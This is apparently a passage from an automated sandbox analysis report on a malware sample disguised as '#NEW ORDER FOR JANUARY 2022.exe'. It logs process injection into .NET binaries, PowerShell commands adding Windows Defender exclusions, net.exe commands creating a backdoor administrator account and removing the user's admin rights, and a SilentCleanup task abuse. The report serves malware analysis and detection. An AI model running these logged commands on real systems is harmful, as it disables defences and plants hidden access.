                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 402000
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 43A000
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 43C000
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 10FA008
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 402000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 43A000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 43C000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: D96008
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43A000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43C000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: AA7008
                      Injects a PE file into a foreign process
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" user ADMIN~1 SECRET@1234 /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators ADMIN~1 /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup users "user" /add
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" localgroup administrators "user" /del
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user ADMIN~1 SECRET@1234 /add
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators ADMIN~1 /add
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup users "user" /add
                      Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators "user" /del
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      Source: aspnet_regbrowsers.exe, 00000025.00000002.938674396.00000000019C0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: aspnet_regbrowsers.exe, 00000025.00000002.938674396.00000000019C0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: aspnet_regbrowsers.exe, 00000025.00000002.938674396.00000000019C0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: aspnet_regbrowsers.exe, 00000025.00000002.938674396.00000000019C0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeQueries volume information: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe VolumeInformation
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
